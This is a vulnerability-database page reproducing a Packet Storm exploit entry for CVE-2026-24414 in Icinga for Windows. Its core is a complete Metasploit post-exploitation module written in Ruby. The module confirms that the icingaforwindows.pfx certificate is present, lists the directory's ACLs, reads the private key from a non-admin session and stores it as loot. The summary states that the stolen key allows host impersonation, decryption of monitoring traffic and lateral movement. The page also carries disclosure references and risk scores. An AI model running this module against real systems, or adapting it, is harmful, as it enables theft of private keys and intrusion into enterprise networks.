Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Icinga for Windows 1.13.3 Private Key Disclosure

🗓️ 25 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 78 Views

Metasploit exploit uses insecure ACLs in Icinga for Windows prior to 1.13.4 to access the private key in icingaforwindows.pfx.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-24414
29 Jan 202617:35
attackerkb
Circl		CVE-2026-24414
29 Jan 202621:01
circl
CNNVD		Icinga PowerShell Framework security vulnerabilities
29 Jan 202600:00
cnnvd
CVE		CVE-2026-24414
29 Jan 202617:35
cve
Cvelist		CVE-2026-24414 Icinga for Windows certificate can have too-open permissions
29 Jan 202617:35
cvelist
EUVD		EUVD-2026-4963
29 Jan 202617:35
euvd
NVD		CVE-2026-24414
29 Jan 202618:16
nvd
OSV		CVE-2026-24414 Icinga for Windows certificate can have too-open permissions
29 Jan 202617:35
osv
Packet Storm		📄 Icinga for Windows 1.13.3 Private Key Exposure
23 Feb 202600:00
packetstorm
Positive Technologies		PT-2026-5318
29 Jan 202600:00
ptsecurity
Rows per page
=============================================================================================================================================
    | # Title     : Icinga for Windows 1.13.3 PowerShell Framework – Insecure Default Certificate Permissions Leads to Private Key Disclosure   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3                                                  |
    =============================================================================================================================================
    
    [+] Summary    : This module identifies and exploits insecure default ACL permissions in vulnerable versions of the Icinga for Windows PowerShell Framework. 
                     The certificate directory is created with overly permissive read access for the BUILTIN\Users group, allowing any local user to access the icingaforwindows.pfx file containing the private key.
                     Successful exploitation enables retrieval of the PKCS#12 certificate file from a non-administrative session, confirming improper permission configuration. 
    				 Exposure of the private key may allow host impersonation, decryption of monitoring traffic, and potential lateral movement within enterprise environments.
    
    The module performs:
    
    Certificate file existence validation
    
    Privilege context detection
    
    Optional ACL enumeration for documentation
    
    Secure loot storage of the exposed private key
    
    This issue affects versions prior to 1.13.4, 1.12.4, and 1.11.2
    				 
    [+] POC   :  
    
    ##
    # This module requires Metasploit Framework
    ##
    
    class MetasploitModule < Msf::Post
      include Msf::Post::File
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Accounts
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Icinga for Windows PowerShell Framework Private Key Disclosure',
            'Description' => %q{
              This module checks and exploits insecure default permissions
              on the Icinga for Windows certificate directory which allows
              local users to read the private key (.pfx file).
            },
            'License' => MSF_LICENSE,
            'Author' => ['indoushka'],
            'Platform' => ['win'],
            'SessionTypes' => ['meterpreter'],
            'References' => [['CVE', '2026-24414']],
            'DisclosureDate' => '2026-02-23'
          )
        )
      end
    
      def certificate_path
        'C:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\certificate\\icingaforwindows.pfx'
      end
    
      def check
        unless session.platform =~ /win/i
          return Exploit::CheckCode::Unsupported
        end
    
        begin
          if file?(certificate_path)
            return Exploit::CheckCode::Appears
          else
            return Exploit::CheckCode::Safe
          end
        rescue
          return Exploit::CheckCode::Unknown
        end
      end
    
      def run
        unless session.platform =~ /win/i
          fail_with(Failure::NoTarget, 'Windows session required.')
        end
    
        print_status("Running as: #{get_current_user}")
        print_status("Admin privileges: #{is_admin?}")
    
        unless file?(certificate_path)
          fail_with(Failure::NotFound, 'Certificate file not found.')
        end
    
        print_good("Target certificate found:")
        print_status(certificate_path)
    
        begin
          acl = cmd_exec("icacls \"#{File.dirname(certificate_path)}\"")
          print_status("ACL Information:\n#{acl}")
        rescue
          print_warning("Could not retrieve ACL information.")
        end
    
        begin
          data = read_file(certificate_path)
    
          if data.nil? || data.empty?
            fail_with(Failure::UnexpectedReply, 'File read returned empty content.')
          end
    
          loot_path = store_loot(
            'icinga.private_key',
            'application/x-pkcs12',
            session,
            data,
            "icingaforwindows_#{Time.now.to_i}.pfx",
            'Exposed Icinga Private Key'
          )
    
          print_good("Private key successfully retrieved!")
          print_good("Stored at: #{loot_path}")
    
          unless is_admin?
            print_warning("VULNERABILITY CONFIRMED: Non-admin session accessed private key.")
          end
    
        rescue Rex::Post::Meterpreter::RequestError => e
          fail_with(Failure::PermissionDenied, "Read failed: #{e.message}")
        end
      end
    
      def get_current_user
        begin
          client.sys.config.getuid
        rescue
          'Unknown'
        end
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 46.8
EPSS0.00004
SSVC
Icinga for Windowsprivate keycertificate fileinsecure permissionslocal accessPowerShell frameworkaffected versionslateral movement
78